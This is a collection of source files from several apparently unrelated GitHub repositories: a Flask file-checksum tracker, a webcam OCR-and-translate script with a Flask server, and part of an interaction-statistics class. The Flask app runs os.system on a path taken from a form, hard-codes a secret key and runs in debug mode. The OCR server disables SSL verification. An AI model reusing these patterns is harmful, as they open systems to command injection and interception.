HiddenField('new_checksum')\n\n\ndef hash_it(file_path):\n # start_time = perf_counter()\n hasher = h.md5() # Type of hash we are using\n block_size = 65536\n\n with open(file_path, 'rb') as f: # 'rb' read the file_path at at a byte level\n buf = f.read(block_size) # Buffer size\n while len(buf) > 0:\n hasher.update(buf)\n buf = f.read(block_size)\n\n package = hasher.hexdigest()\n # end_time = perf_counter()\n return package\n\n\ndef check_sum_all(files):\n check_sum_results = []\n file_filter = [x.file_path for x in files]\n for file in file_filter:\n chk_sum = hash_it(file)[0]\n db_check = session.query(File).filter(File.check_sum == chk_sum).first()\n\n payload = (file, chk_sum, db_check)\n check_sum_results.append(payload)\n\n # Shoot off bits of data via AJAX ???\n #\n #\n #\n\n return check_sum_results\n\n\ndef add_file_object(user, path, check_sum):\n from os.path import dirname\n if path == dirname(path):\n from os import listdir\n\n for file in listdir(path):\n check_sum = hash_it(file)\n file_object = File(file_path=file, check_sum=check_sum)\n\n # new_object = get_directory_object()\n\n else:\n new_object = File(file_path=path, check_sum=check_sum)\n\n user.files.append(new_object)\n session.add(user)\n session.commit()\n\n\ndef delete_file(user, file):\n check_sum = session.query(File.check_sum).filter(File.file_path == file)\n f = File(file_path=file, check_sum=check_sum)\n\n\ndef get_stored_files(user):\n try:\n stored = session.query(user.files).all()\n except sqlalchemy.exc.InvalidRequestError as e:\n print(\"ERROR InvalidRequestError: {}\".format(e))\n stored = []\n return stored\n\n\ndef get_user_session():\n # User data acquired by os.getenv() and socket.gethostname()\n user_name = getenv('username') # Client username ['amagoon']\n hostname = gethostname() # Client hostname ['dsa-LT4']\n\n # DB session initialization\n\n # User query\n user_q = session.query(User).filter(User.u_name == user_name).first()\n if not user_q:\n new_user = User(u_name=user_name, hostname=hostname)\n session.add(new_user)\n session.commit()\n user_q = session.query(User).filter(User.u_name == user_name).first()\n\n return user_q\n\n\ndef get_local_ip():\n import socket as s\n con = s.socket(s.AF_INET, s.SOCK_DGRAM)\n con.connect(('8.8.8.8', 0))\n local_ip = con.getsockname()[0]\n return local_ip\n\n\[email protected]('/handle_form', methods=['POST'])\ndef handle_form():\n def query_form(var_name):\n return request.form.getlist(var_name)\n\n clicked = query_form('clicked')[0]\n del_val = query_form('del_value')[0]\n\n new_checksum = query_form('new_checksum')[0]\n\n if clicked == 'delete':\n session.query(File).filter(File.check_sum == del_val).delete()\n session.commit()\n\n elif clicked == 'open':\n from os import system\n from os.path import dirname\n path = query_form('path')[0]\n folder = dirname(path)\n system('explorer {}'.format(folder))\n\n elif clicked == 'update':\n print(\"Update - new_checksum: {}\\nOld checksum: {}\".format(new_checksum, del_val))\n session.query(File).filter(File.check_sum == del_val).update({\"check_sum\": new_checksum})\n session.commit()\n\n return redirect(url_for('view'))\n\n\[email protected]('/delete', methods=['POST'])\ndef delete_entry(): # Testing\n print(\"yesssirrr\")\n if request.method == 'POST':\n user = get_user_session()\n form = request.form.getlist('del_value')\n new_test_val = request.form.getlist('delete')\n print(\"new_test_value = {}\\nType: {}\".format(new_test_val, type(new_test_val)))\n del_file = form[0] # hash value of file\n\n s = session.query(File).filter(File.check_sum == del_file).delete()\n print(\"Session query for hash value = {}\\nType: {}\".format(s, type(s)))\n return redirect(url_for('view'))\n\n\[email protected]('/add_file_object', methods=['GET', 'POST'])\ndef add_entry():\n import os\n form = AddFile(request.form)\n new_file = form.new_file._value().replace(\"\\\"\", '') # File path\n is_file = os.path.isfile(new_file)\n is_dir = os.path.dirname(new_file) == new_file\n\n if form.validate():\n\n if is_file:\n user = get_user_session()\n hash_val = hash_it(new_file)\n add_file_object(user, new_file, hash_val)\n\n elif is_dir:\n pass\n\n return redirect(url_for('view'))\n else:\n flash(\"File doesn't exist. Check your file path.\")\n return redirect(url_for('view'))\n\n\[email protected]('/', methods=['GET', 'POST'])\ndef view():\n payload = [] # Return values | list of tuples\n local_ip = get_local_ip()\n\n # Here's our user\n user = get_user_session()\n\n for file in user.files:\n fp = file.file_path\n current_check_sum = hash_it(fp) # Function that goes to hash the file right now\n file_data = (file, current_check_sum)\n payload.append(file_data)\n\n return render_template('check_sums.html', form=AddFile(), check_sum_results=payload,\n u_name=user.u_name, h_name=user.hostname, ip_address=local_ip)\n\n\nif __name__ == '__main__':\n app.secret_key = 'super secret key'\n app.config['SESSION_TYPE'] = 'filesystem'\n app.run(port=80, debug=True)\n" }, { "alpha_fraction": 0.5287356376647949, "alphanum_fraction": 0.7126436829566956, "avg_line_length": 16.600000381469727, "blob_id": "4eb6a7abd5fe97f0ff749038fdba58d76dc2b9ea", "content_id": "20c93633298051fb94fc263392e5170939d51910", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 87, "license_type": "no_license", "max_line_length": 21, "num_lines": 5, "path": "/requirements.txt", "repo_name": "AdamMagoon/FlaskBrowserGUI", "src_encoding": "UTF-8", "text": "Flask>=0.10.1\nFlask-Login>=0.3.2\nbackports.pbkdf2>=0.1\nwtforms>=2.0.2\nsqlalchemy>=1.0.9" }, { "alpha_fraction": 0.7291666865348816, "alphanum_fraction": 0.75, "avg_line_length": 27.899999618530273, "blob_id": "d278d0e8053c3ed10e4682508d70b916cca31e68", "content_id": "0f28257fd14151a25b57ff4b8a25a8a94bc0d1a3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 288, "license_type": "no_license", "max_line_length": 105, "num_lines": 10, "path": "/README.txt", "repo_name": "AdamMagoon/FlaskBrowserGUI", "src_encoding": "UTF-8", "text": "This is using a Flask layout from a previous project. However, the main functionality is on the homepage:\n\nhttp://localhost/\nor\nhttp://127.0.0.1/\n\nTo use:\n- run main.py\n- point your browser to either of the above locations (http://localhost/)\n- Add Files using the obviously marked input." } ]
3
prp-e/ocr_translator
https://github.com/prp-e/ocr_translator
f3f685e4da7c70680366a9dd0e1d883cd79b2e01
afcc1862b952ddf64aa04361af85e14c36b97822
20236475d6554645ccdb491a4daf6362d40fb1ab
refs/heads/main
2023-04-18T01:48:12.749261
2021-05-13T21:54:22
2021-05-13T21:54:22
366,425,307
1
0
null
null
null
null
null
[ { "alpha_fraction": 0.6345698237419128, "alphanum_fraction": 0.637726902961731, "avg_line_length": 23.86274528503418, "blob_id": "c4c5b4cb4580521cff7fc31a7d87dd300543705d", "content_id": "b4c2b60f32ef3aa26f671fd57aad3bb2852bff1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1267, "license_type": "no_license", "max_line_length": 106, "num_lines": 51, "path": "/server_old.py", "repo_name": "prp-e/ocr_translator", "src_encoding": "UTF-8", "text": "\"\"\" This code checks for macOS, if you have SSL problem with any other OS's, please add it to the code \"\"\"\nimport sys\n\nif sys.platform == 'darwin':\n import requests \n\n requests.packages.urllib3.disable_warnings() \n\n import ssl \n\n try:\n\n _create_unverified_https_context = ssl._create_unverified_context \n\n except AttributeError: \n\n pass \n\n else: \n ssl._create_default_https_context = _create_unverified_https_context\n\n\"\"\" Main code \"\"\" \nimport cv2 \nfrom flask import Flask, request\nimport easyocr \nimport numpy as np \n\nreader = easyocr.Reader(['en'], gpu=False)\n\napp = Flask(__name__)\n\[email protected]('/', methods=['POST'])\ndef magic():\n json_input = request.get_json()\n image = np.array(json_input['image'])\n cv2.imwrite('output.jpg', image)\n input_image = cv2.imread('output.jpg')\n image_data = reader.readtext(input_image)\n \n output_array = []\n for datum in image_data:\n output_data = {}\n output_data['cooridnates'], output_data['text'], output_data['confidence'] = datum\n output_data['confidence'] = str(output_data['confidence']) \n output_array.append(output_data)\n \n output = {'data': output_array}\n return output\n\nif __name__ == '__main__':\n app.run(debug=True)" }, { "alpha_fraction": 0.6982758641242981, "alphanum_fraction": 0.6982758641242981, "avg_line_length": 16.769229888916016, "blob_id": "a618ba0d53572030ced86ec36180045c718346bc", "content_id": "c012a0e76948c1cdb46e642b48a10b5e9cedc47d", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 232, "license_type": "no_license", "max_line_length": 113, "num_lines": 13, "path": "/README.md", "repo_name": "prp-e/ocr_translator", "src_encoding": "UTF-8", "text": "# How to use \n\n* Install dependencies:\n\n```\npip install opencv-python easyocr\n``` \n\n* Run the code (please mind that you need a webcam or you can use your phone with Iriun or DroidCam as an input.)\n\n```\npython ocr_translate.py\n``` \n" }, { "alpha_fraction": 0.5799999833106995, "alphanum_fraction": 0.6031249761581421, "avg_line_length": 26.05084800720215, "blob_id": "bd95f98e5964af57ad84e6caa0efc2553eb70a28", "content_id": "af9f1c7c53f76985c40f2c9c819b20d48f4628f1", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1600, "license_type": "no_license", "max_line_length": 71, "num_lines": 59, "path": "/ocr_translate.py", "repo_name": "prp-e/ocr_translator", "src_encoding": "UTF-8", "text": "\"\"\" Main code \"\"\" \n\nimport cv2 \nimport easyocr \nimport googletrans\nimport time \n\ndef read_image_data(image, text_reader):\n image_data = reader.readtext(image, workers=1)\n texts = []\n for datum in image_data:\n coordinates, text, confidence = datum \n texts.append(text)\n top_left = (int(coordinates[0][0]), int(coordinates[0][1]))\n bottom_right = (int(coordinates[2][0]), int(coordinates[2][1]))\n cv2.rectangle(image, top_left, bottom_right, (0, 255, 0), 5) \n \n return texts\n\ndef camera_data(camera):\n while True:\n _, image = camera.read()\n cv2.imshow('Camera', image)\n exit = cv2.waitKey(30) & 0xff\n if exit == 32:\n cv2.imwrite(file_name, image)\n break\n\n camera.release()\n cv2.destroyAllWindows()\n\ndef translation(texts):\n translator = googletrans.Translator()\n for text in texts:\n translation = translator.translate(text, dest=\"fa\")\n print(f'{text} : {translation.text}')\n\nif __name__ == '__main__':\n \"\"\" Global Variables \"\"\"\n camera = cv2.VideoCapture(0) \n reader = easyocr.Reader(['en'], gpu=False)\n file_name = 'photo_taken.jpg'\n fps = camera.get(cv2.CAP_PROP_FPS)\n fps = int(fps) + 1\n print(f'FPS : {fps}')\n\n camera_data(camera=camera)\n time.sleep(5)\n\n image_to_recognize = cv2.imread(file_name)\n text_data = read_image_data(image_to_recognize, reader)\n\n translation(text_data)\n\n cv2.imshow('Result', image_to_recognize)\n \n exit_key = cv2.waitKey(0) & 0xff\n if exit_key == ord('q'):\n cv2.destroyAllWindows()\n " } ]
3
zogbr/django-deployment-example
https://github.com/zogbr/django-deployment-example
4b5e97855b7fbeb861d1f1dceb47468a2d531e6f
9d05059456e1e64d3cbf452c577651703e17e9a2
29049bc1e693c8070a1898100a90ddd226d7b48a
refs/heads/main
2023-03-03T19:17:46.919334
2021-02-15T09:46:19
2021-02-15T09:46:19
339,010,138
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.7221750020980835, "alphanum_fraction": 0.7451146841049194, "avg_line_length": 64.22222137451172, "blob_id": "13a3df5261f9bfff308940f479935499e2359dc6", "content_id": "58b3d822f4190a9a237139111987c6af29422ac7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1177, "license_type": "no_license", "max_line_length": 104, "num_lines": 18, "path": "/my_site/authenticate/forms.py", "repo_name": "zogbr/django-deployment-example", "src_encoding": "UTF-8", "text": "from django.contrib.auth.forms import UserCreationForm\nfrom django.contrib.auth.models import User\nfrom django import forms\n\nclass SignUpForm(UserCreationForm):\n\tusername = forms.CharField(max_length=150, widget=forms.TextInput(attrs={'class':'form-control'}))\n\temail = forms.EmailField(widget=forms.EmailInput(attrs={'class':'form-control'}))\n\tfirst_name = forms.CharField(max_length=100, widget=forms.TextInput(attrs={'class':'form-control'}))\n\tlast_name = forms.CharField(max_length=100, widget=forms.TextInput(attrs={'class':'form-control'}))\n\tuser_function = forms.CharField(max_length=100, widget=forms.TextInput(attrs={'class':'form-control'}))\n\tphone1 = forms.CharField(max_length=30, widget=forms.TextInput(attrs={'class':'form-control'}))\n\tphone2 = forms.CharField(max_length=30, widget=forms.TextInput(attrs={'class':'form-control'}))\n\tpassword = forms.CharField(max_length=100, widget=forms.TextInput(attrs={'class':'form-control'}))\n\tpassword1 = forms.CharField(max_length=100, widget=forms.TextInput(attrs={'class':'form-control'}))\n\n\tclass Meta:\n\t\tmodel = User\n\t\tfields = ('username', 'first_name', 'last_name', 'email', 'user_function', 'phone1', 'phone2',)\n\t\t\t" }, { "alpha_fraction": 0.6919831037521362, "alphanum_fraction": 0.7236286997795105, "avg_line_length": 32.92856979370117, "blob_id": "42a58392a2060af6be05ca0e9c4735d551f7ee6d", "content_id": "0b5393ef4b3a1468ca7eeaeb746f89f6cc81db1f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 474, "license_type": "no_license", "max_line_length": 109, "num_lines": 14, "path": "/my_site/authenticate/models.py", "repo_name": "zogbr/django-deployment-example", "src_encoding": "UTF-8", "text": "from django.db import models\n\n# Create your models here.\nclass User(User):\n\ttitle = forms.CharField(max_length=30)\n\tspeciality = forms.CharField(max_length=255)\n\tphone1 = forms.CharField(max_length=30)\n\tphone2 = forms.CharField(max_length=30)\n\tphonemobile = forms.CharField(max_length=30)\n\tcity = forms.CharField(max_length=50)\n\n\tclass Meta(object):\n\t\tmodel = User\n\t\tfields('username', 'first_name', 'last_name', 'email', 'password', 'groups', 'is_active', 'is_superuser', )" } ]
2
JonoCX/interaction-lib
https://github.com/JonoCX/interaction-lib
ed7b6ee4dd4e885aae5429047fdbe2ff325e45fd
a0b64183c943eb5857b10106198e185c256939fa
13914bacf709dc7740f50a2b18a59f2149857fea
refs/heads/master
2023-04-14T23:01:50.675501
2022-01-19T15:14:22
2022-01-19T15:14:22
255,882,623
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.5252060294151306, "alphanum_fraction": 0.5286529660224915, "avg_line_length": 44.67404556274414, "blob_id": "046ed08ec3868886bbc8521aa1726b4c6e429842", "content_id": "2db3b69601f7ae3b0fdcf5ac9cc04817a26a9943", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 37134, "license_type": "no_license", "max_line_length": 107, "num_lines": 813, "path": "/interlib/preprocessing/statistics.py", "repo_name": "JonoCX/interaction-lib", "src_encoding": "UTF-8", "text": "\"\"\" \"\"\"\n\nfrom numpy.core.multiarray import result_type\nfrom .base import BaseExtractor\nfrom ..util import get_hidden_time, missing_hidden_visibility_change, safe_division\n\nfrom joblib import Parallel, delayed, cpu_count\nfrom datetime import datetime as dt\nfrom collections import Counter, defaultdict\nfrom typing import Optional, Union, List, Set, Dict\n\nimport numpy as np \nimport pandas as pd \n\nnp.random.seed(42)\n\nNEC = 'NARRATIVE_ELEMENT_CHANGE'\nBVC = 'BROWSER_VISIBILITY_CHANGE'\n\nclass Statistics(BaseExtractor):\n \n def __init__(\n self, \n user_event_dict: Dict[str, List[Dict]], \n completion_point: Optional[str] = None,\n n_jobs: Optional[int] = 1,\n narrative_element_durations: Optional[Dict[str, float]] = None\n ) -> None: \n BaseExtractor.__init__(\n self,\n user_event_dict = user_event_dict.copy(),\n completion_point = completion_point,\n n_jobs = n_jobs,\n )\n\n self._statistics = {}\n self._time_statistics = {}\n self._pause_statistics = {}\n self._event_statistics = {}\n self._user_event_frequencies = {}\n self._nec_durations = narrative_element_durations\n\n def time_statistics(\n self, \n verbose: Optional[int] = 0, \n user_id: Optional[str] = None\n ) -> Dict:\n \"\"\" \n Using the user event data, calculate the hidden time, raw\n session length, and session length of the users.\n\n :params verbose: passed to the joblib backend\n :params user_id: a specific user to get the statistics for\n :returns: dictionary of results {user -> {hidden_time: 0...}}\n \"\"\"\n def _get_timings(events):\n times = defaultdict(float) # {<nec_name>: <time spent>}\n for idx, event in enumerate(events):\n if event == events[-1]: break \n\n if event['action_name'] == NEC:\n # search forward to gather all events between this NEC and the next\n intermediate_events = []\n for ev in events[idx + 1:]:\n intermediate_events.append(ev)\n\n # exit once we've found the next NEC\n if ev['action_name'] == NEC: break\n\n # if there's only one - i.e. the next NEC was immediately following\n if (len(intermediate_events) == 1 and \n intermediate_events[0]['action_name'] == NEC): \n time_diff = ( # get the time difference in seconds\n intermediate_events[0]['timestamp'] - event['timestamp']\n ).total_seconds()\n else: # then we have some additional (BVC) events in between\n non_nec_events = [ # get all of those non-NEC events\n ev for ev in intermediate_events if ev['action_name'] != NEC\n ]\n hidden_times = []\n for non_nec_idx, non_nec_ev in enumerate(non_nec_events):\n hidden_times.append(get_hidden_time(\n non_nec_ev['timestamp'], non_nec_idx, non_nec_events\n ))\n\n time_diff = ( # get the time difference\n intermediate_events[-1]['timestamp'] - event['timestamp']\n ).total_seconds() - sum(hidden_times)\n\n times[event['data']['romper_to_state']] += time_diff # times.append(time_diff)\n return times \n\n def _get_normalised_nec_time(user_timings):\n times = []\n \n for nec, time in user_timings.items():\n if nec not in self._nec_durations.keys():\n continue \n\n if self._nec_durations[nec] == 0:\n times.append(0.0)\n else:\n default_duration = self._nec_durations[nec]\n times.append(safe_division(time, default_duration))\n\n return {\n 'norm_avg_nec_time': np.mean(times),\n 'norm_std_nec_time': np.std(times)\n }\n\n def _get_average_nec_time(user_dict, no_event_set = None):\n result = {}\n\n for user, events in user_dict.items():\n if user in no_event_set:\n result[user] = {\n 'avg_nec_time': 0.0, 'std_nec_time': 0.0, 'med_nec_time': 0.0\n }\n continue\n\n nec_bvc_events = [ # get the BVC and NEC events\n ev \n for ev in events \n if (ev['action_name'] == 'BROWSER_VISIBILITY_CHANGE' or \n ev['action_name'] == 'NARRATIVE_ELEMENT_CHANGE')\n ]\n\n times = _get_timings(nec_bvc_events)\n times_arr = [t for t in times.values()]\n\n if self._nec_durations:\n norm_times = _get_normalised_nec_time(times)\n result[user] = {\n 'avg_nec_time': np.mean(times_arr),\n 'std_nec_time': np.std(times_arr),\n 'med_nec_time': np.median(times_arr),\n 'norm_avg_nec_time': norm_times['norm_avg_nec_time'],\n 'norm_std_nec_time': norm_times['norm_std_nec_time']\n }\n else:\n result[user] = {\n 'avg_nec_time': np.mean(times_arr),\n 'std_nec_time': np.std(times_arr),\n 'med_nec_time': np.median(times_arr)\n }\n\n return result\n \n def _get_stats(user_chunk, data_chunk):\n user_dict = {user: [] for user in user_chunk}\n for d in data_chunk: user_dict[d['user']].append(d)\n\n results = {user: {} for user in user_chunk}\n\n timestamps = {}\n no_events_set = set([])\n # calculate the hidden time (and get the timestamps)\n for user, events in user_dict.items():\n if len(events) < 1: # if there are no events\n no_events_set.add(user) # essentially set a flag per user\n \n # set hidden time/raw to 0.0\n results[user].update({'hidden_time': 0.0, 'raw_session_length': 0.0}) \n continue # move onto the next user\n\n timestamps[user] = [event['timestamp'] for event in events] # collect timestamps\n\n hidden_times = []\n hidden_time_completion_point = None \n timestamp_reached_completion_point = None\n # for all events, if there is a visibility change to hidden\n for index, event in enumerate(events): \n if (event['action_name'] == 'BROWSER_VISIBILITY_CHANGE' and \n event['data']['romper_to_state'] == 'hidden'):\n hidden_times.append(\n get_hidden_time(\n event['timestamp'],\n index,\n events\n )\n )\n\n # time of completion\n if self.completion_point:\n if (event['action_type'] == 'STORY_NAVIGATION' and \n event['data']['romper_to_state'] == self.completion_point and\n self._users_reached_completion_point[user]):\n hidden_time_completion_point = np.sum(hidden_times)\n timestamp_reached_completion_point = event['timestamp']\n\n # record the sum of the hidden times\n results[user].update({'hidden_time': np.sum(hidden_times)})\n\n # time to completion statistics\n if self.completion_point:\n if not self._users_reached_completion_point[user]:\n results[user].update({'time_to_completion': 0.0})\n else:\n # have to take into account the hidden time.\n raw_time = (\n timestamp_reached_completion_point - timestamps[user][0]\n ).total_seconds()\n results[user].update({\n 'time_to_completion': raw_time - hidden_time_completion_point\n })\n # add in whether the user reached teh end\n results[user].update({\n 'reach_end': self._users_reached_completion_point[user],\n 'last_ne_seen': self.last_ne[user]\n })\n\n # calculate the raw session length\n for user, ts in timestamps.items():\n results[user].update({'raw_session_length': (ts[-1] - ts[0]).total_seconds()})\n\n # calculate the average (plus other statistics) NEC time\n avg_nec_times = _get_average_nec_time(user_dict, no_events_set)\n if self._nec_durations:\n for user, res in avg_nec_times.items():\n results[user].update({\n 'avg_nec_time': res['avg_nec_time'],\n 'std_nec_time': res['std_nec_time'],\n 'med_nec_time': res['med_nec_time'],\n 'norm_avg_nec_time': res['norm_avg_nec_time'],\n 'norm_std_nec_time': res['norm_std_nec_time']\n }) \n else:\n for user, res in avg_nec_times.items():\n results[user].update({\n 'avg_nec_time': res['avg_nec_time'],\n 'std_nec_time': res['std_nec_time'],\n 'med_nec_time': res['med_nec_time']\n })\n\n for user, res in results.copy().items(): # update the results with the session length\n if user in no_events_set: sess_length = 0.0\n else: sess_length = res['raw_session_length'] - res['hidden_time']\n results[user].update({'session_length': sess_length})\n\n return results\n\n if not self._time_statistics: # we've not already calculated\n if user_id is not None: # if the user is wanting a specific user\n if not isinstance(user_id, str):\n raise TypeError('User ID should be a String: {0}'.format(user_id))\n \n if user_id not in self.data.keys():\n raise ValueError('Invalid User ID: {0}'.format(user_id))\n\n # calculate the statistics for that user\n return _get_stats(user_chunk = [user_id], data_chunk = self.data[user_id])[user_id]\n\n self._time_statistics = {user: {} for user, d in self.data.items()}\n parallel = Parallel(n_jobs = self._num_cpu, verbose = verbose)\n\n # run the process to calculate the statistics\n res = parallel(delayed(_get_stats) (u, e) for u, e in self._users_split)\n \n # unpack the results into the time statistics dictionary\n for r in res:\n for u, s in r.items():\n self._time_statistics[u].update(s)\n \n return self._time_statistics\n else: # otherwise just return the pre-calculate statistics\n if user_id is not None: # if the user is wanting a specific user\n if not isinstance(user_id, str):\n raise TypeError('User ID should be a string: {0}'.format(user_id))\n \n if user_id not in self._time_statistics.keys() or user_id not in self.data.keys():\n raise ValueError('Invalid User ID: {0}'.format(user_id))\n \n # retrieve the statistics for that user.\n return self._time_statistics[user_id]\n return self._time_statistics\n\n def session_length(\n self, \n user_id: Optional[str] = None, \n verbose: Optional[int] = 0\n ) -> Dict:\n \"\"\" \n Calculate the session length only.\n\n :params user_id: specify a user, default is to calculate\n for all users\n :params verbose: verbosity passed to the joblib backend \n :returns: the session length or \n all session lengths as dictionary {user -> session length}\n \"\"\"\n if self._time_statistics: # if the statistics have already been written\n if user_id: # if the request is for a single user\n if user_id not in self._time_statistics.keys(): \n raise ValueError('Invalid user id (perhaps the user is not in the data)')\n\n return self._time_statistics[user_id]['session_length']\n return {user: stat['session_length'] for user, stat in self._time_statistics.items()}\n else:\n self.time_statistics(verbose = verbose)\n\n if user_id:\n if user_id not in self._time_statistics.keys():\n raise ValueError('Invalid user id (perhaps the user is not in the data)')\n return self._time_statistics[user_id]['session_length']\n \n return {user: stat['session_length'] for user, stat in self._time_statistics.items()}\n\n def _pause_counts(\n self, \n events: list,\n pauses_include_events: Optional[Set] = {},\n pauses_exclude_events: Optional[Set] = {}, \n ) -> Dict[str, int]:\n \"\"\"\n Given a set of user actions, count the number of\n pauses that occur.\n\n :params events: the user events\n :params pauses_include_events: a set of events to include outside of the standard\n USER_ACTION events, i.e., browser visibility and window orientation changes\n :params pauses_exclude_events: a set of events to exclude from the pause calculations.\n \"\"\"\n pauses = []\n previous_timestamp = events[0]['timestamp']\n for event in events:\n # if the event is a user action OR in the events we want to include AND not in the\n # events we want to exclude, then calculate the pauses\n if ((event['action_type'] == 'USER_ACTION' or \n event['action_name'] in pauses_include_events) and \n event['action_name'] not in pauses_exclude_events): \n\n pause_type, diff = self._type_of_pause(previous_timestamp, event['timestamp'])\n\n # if there is a pause of some description, then add to the list\n if pause_type != 0: \n pauses.append(pause_type)\n\n # set the previous timestamp to the current\n previous_timestamp = event['timestamp']\n\n \n pauses = Counter(pauses)\n return {\n 'SP': pauses['SP'], 'MP': pauses['MP'], 'LP': pauses['LP'], 'VLP': pauses['VLP']\n }\n \n def pause_statistics(\n self, \n verbose: Optional[int] = 0, \n user_id: Optional[str] = None,\n pauses_include_events: Optional[Set] = {},\n pauses_exclude_events: Optional[Set] = {} \n ) -> Dict[str, Dict]:\n \"\"\" \n Based on the event data supplied, calculate the pause\n statistics for each of the users.\n\n :params verbose: verbosity level passed to the joblib backend\n :params user_id: a specific user to calculate the statistics for\n :params pauses_include_events: a set of events to include outside of the standard\n USER_ACTION events, i.e., browser visibility and window orientation changes\n :params pauses_exclude_events: a set of events to exclude from the pause calculations.\n :returns: a dictionary with a mapping from user to statistics\n \"\"\"\n def _get_pauses(user_chunk, data_chunk):\n user_dict = {user: [] for user in user_chunk}\n for d in data_chunk: user_dict[d['user']].append(d)\n\n results = {user: {} for user in user_chunk}\n\n for user, events in user_dict.items():\n if len(events) < 1: # if the user has no events\n results[user].update({'SP': 0, 'MP': 0, 'LP': 0, 'VLP': 0})\n continue\n\n results[user].update(\n self._pause_counts(\n events, \n pauses_include_events = pauses_include_events,\n pauses_exclude_events = pauses_exclude_events\n )\n )\n \n return results\n\n # if the statistics haven't been previously calculated\n if not self._pause_statistics:\n if user_id is not None: # if the user is asking for the stats of a specific user\n if not isinstance(user_id, str):\n raise TypeError('User Id should be a string: {0}'.format(user_id))\n\n if user_id not in self.data.keys():\n raise ValueError('Invalid user id: {0}'.format(user_id))\n \n # calculate the pause statistics for that individual (non-parallel)\n return _get_pauses(user_chunk = [user_id], data_chunk = self.data[user_id])[user_id]\n\n self._pause_statistics = {user: {} for user, d in self.data.items()}\n parallel = Parallel(n_jobs = self._num_cpu, verbose = verbose)\n\n # run the pause statistics job in parallel\n res = parallel(delayed(_get_pauses) (u, e) for u, e in self._split_users())\n\n # unpack the results and add to the pause statistics dictionary\n for r in res:\n for u, p in r.items():\n self._pause_statistics[u].update(p)\n\n return self._pause_statistics\n else:\n if user_id is not None:\n if not isinstance(user_id, str):\n raise TypeError('User Id should be a string: {0}'.format(user_id))\n\n if user_id not in self._pause_statistics.keys() or user_id not in self.data.keys():\n raise ValueError('Invalid user id: {0}'.format(user_id))\n\n return self._pause_statistics[user_id]\n return self._pause_statistics\n\n def event_statistics(\n self,\n interaction_events: Set[str],\n include_link_choices: Optional[bool] = False,\n include_user_set_variables: Optional[bool] = False,\n verbose: Optional[int] = 0,\n user_id: Optional[str] = None\n ) -> Dict[str, Dict[str, int]]:\n \"\"\" \n \n :params interaction_events: all of the events that should be counted\n :params include_link_choices: whether to include LC in the total count\n :params include_user_set_variable: whether to include USV in the total count\n :params verbose: the level of output passed to the joblib backend\n :params user_id: the specific user to fetch statistics on\n :returns: event-based statistics (dictionary)\n \"\"\"\n def _event_stats(user_chunk, data_chunk):\n user_dict = {user: [] for user in user_chunk}\n for d in data_chunk: user_dict[d['user']].append(d)\n\n results = {user: {} for user in user_chunk}\n\n for user, events in user_dict.items():\n if len(events) < 1: # if the user has no events\n results[user].update({ev: 0 for ev in interaction_events})\n continue\n\n ua_counter = defaultdict(int) # counter for all events\n\n # set the default for each of the events\n for event in interaction_events: ua_counter[event] = 0\n\n for event in events:\n if event['action_name'] in interaction_events:\n ua_counter[event['action_name']] += 1\n \n # subtract one from PLAY_PAUSE, there's always one at the beginning and\n # only if the value is not 0\n if ua_counter['PLAY_PAUSE_BUTTON_CLICKED'] != 0:\n ua_counter['PLAY_PAUSE_BUTTON_CLICKED'] -= 1\n\n # calculate the total number of events\n total_events = sum(ua_counter.values())\n\n if not include_link_choices:\n total_events -= ua_counter['LINK_CHOICE_CLICKED']\n \n if not include_user_set_variables:\n total_events -= ua_counter['USER_SET_VARIABLE']\n\n # calculate relative frequency for each event\n user_actions_proportion = defaultdict(float)\n for event, count in ua_counter.items():\n user_actions_proportion[event + '_proportion'] = safe_division(\n count, total_events) / 100\n\n results[user].update(dict(ua_counter))\n results[user].update(dict(user_actions_proportion))\n results[user].update({'total_events': total_events})\n \n return results \n\n # check that the interaction events is a set\n if not isinstance(interaction_events, set):\n raise TypeError(\n 'Interaction events should be a set of actions: {0}'.format(interaction_events))\n \n # check that the interaction events set contains something\n if len(interaction_events) == 0:\n raise ValueError('Interaction events cannot be empty: {0}'.format(interaction_events))\n\n if not self._event_statistics:\n if user_id is not None: # if a specific user is requested\n if not isinstance(user_id, str):\n raise TypeError('User ID should be a string: {0}'.format(user_id))\n \n if user_id not in self.data.keys():\n raise ValueError('Invalid user ID: {0}'.format(user_id))\n\n # calculate the event statistics for that user\n return _event_stats(\n user_chunk = [user_id], data_chunk = self.data[user_id])[user_id]\n \n self._event_statistics = {user: {} for user, d in self.data.items()}\n parallel = Parallel(n_jobs = self._num_cpu, verbose = verbose)\n\n # run the event extract in parallel\n results = parallel(delayed(_event_stats) (u, e) for u, e in self._split_users())\n\n # unpack the results and add to the event statistics dictionary\n for res in results:\n for user, event_stats in res.items():\n self._event_statistics[user].update(event_stats)\n\n return self._event_statistics\n else:\n if user_id is not None: # if a specific user is requested\n if not isinstance(user_id, str):\n raise TypeError('User ID should be a string: {0}'.format(user_id))\n \n if user_id not in self.data.keys():\n raise ValueError('Invalid user ID: {0}'.format(user_id))\n\n return self._event_statistics[user_id]\n return self._event_statistics\n\n def event_frequencies(\n self, \n frequencies: List[Union[int, float]],\n interaction_events: List[str], \n user_id: Optional[str] = None, \n include_pauses: Optional[bool] = False,\n verbose: Optional[int] = 0\n ) -> Dict[str, Dict[str, Dict[str, int]]]:\n \"\"\" \n From a list of events and give a set of time thresholds,\n calculate the frequency that events happen in those periods.\n \n :params frequencies: a list of seconds as integers that you want\n to capture event frequencies for, e.g. [0, 60, 120, 180] would indicate that\n you want event frequencies for minutes 0 to 1, 1 to 2, and 2 to 3.\n :params interaction_events: a set of events that you want to capture\n frequencies for.\n :params user_id: a specific user to capture event frequencies for.\n :params verbose: the amount of std out (passed to joblib backend)\n :returns: a dictionary mapping users to an inner dictionary containing\n a mapping of time thresholds and the count of the interaction_events\n in that time threshold\n \"\"\"\n def _subset(min_threshold, max_threshold, events, previous_subset_ids):\n events_subset = []\n elapsed_time = 0\n 